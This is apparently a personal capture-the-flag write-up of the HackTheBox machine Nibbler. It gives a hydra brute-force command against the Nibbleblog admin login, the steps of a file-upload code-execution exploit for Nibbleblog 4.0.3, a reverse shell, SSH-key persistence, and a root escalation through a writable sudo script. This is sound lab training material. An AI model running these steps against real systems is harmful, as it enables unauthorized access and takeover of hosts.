HackTheBox - Nibbler

Morten Hansen • January 30, 2022

NIBBLER

IP 10.10.10.75
NMAP
Shows port 22 and 80 open. Checking the webpage shows nothing. In the comments of the source-code it hints towards nibbleblog-folder.

Checking the files it shows us admin@nibbles.com and user admin. With gobuster we find /admin.php and try to log in. Trying SQL-injection bans us from the site for some minutes.

Also tried hydra with following command:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password. Forgot password" -V 

[80][http-post-form] host: 10.10.10.75   login: admin   password: iloveyou
[80][http-post-form] host: 10.10.10.75   login: admin   password: password
[80][http-post-form] host: 10.10.10.75   login: admin   password: 123456
[80][http-post-form] host: 10.10.10.75   login: admin   password: 12345
[80][http-post-form] host: 10.10.10.75   login: admin   password: 1234567
[80][http-post-form] host: 10.10.10.75   login: admin   password: abc123
[80][http-post-form] host: 10.10.10.75   login: admin   password: rockyou
[80][http-post-form] host: 10.10.10.75   login: admin   password: 12345678
[80][http-post-form] host: 10.10.10.75   login: admin   password: princess
[80][http-post-form] host: 10.10.10.75   login: admin   password: daniel
[80][http-post-form] host: 10.10.10.75   login: admin   password: 123456789
[80][http-post-form] host: 10.10.10.75   login: admin   password: monkey
[80][http-post-form] host: 10.10.10.75   login: admin   password: lovely
[80][http-post-form] host: 10.10.10.75   login: admin   password: babygirl
[80][http-post-form] host: 10.10.10.75   login: admin   password: jessica
[80][http-post-form] host: 10.10.10.75   login: admin   password: nicole
1 of 1 target successfully completed, 16 valid passwords found
````

This did not work and I ended up guessing the password that was `nibbles`. When logged in we find the version-number of `Nibbleblog 4.03.`. 

Search shows exploit to version
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html

When logged in we follow the exploit.
```bash
### **Proof of Concept**

1.  Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
2.  Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
3.  Upload PHP shell, ignore warnings
4.  Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.

Setting up a listener and uploading a php reverse-shell, we get a reverse connection as Nibbler.

When inside we create a .ssh-folder and gives it the correct permissions chmod 700 .ssh and creates a authorized_keys file with our own public ssh-key. We then SSH in with nibbler@10.10.10.75.

Inside nibblers home-folder it is a ZIP file called personal.zip. Unzip the file and in creates the file /home/nibbler/personal/stuff/monitor.sh. Running sudo -l says that nibbler can run the script as root.

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

When trying to run the script as root we get an error-message and it wont launch. The script executes when not trying to use sudo.

After some inspection we see that the file-permissions are -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh which means we can edit the file.

We then deletes the content and creates the following script

#!/bin/bash

/bin/bash -p

This gives us a new shell with sudo privilages. We are then root and can read the flag at /root/root.txt.